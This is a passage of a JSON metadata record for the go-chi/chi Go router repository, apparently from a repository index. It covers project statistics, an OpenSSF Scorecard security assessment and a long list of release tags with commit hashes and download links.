services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":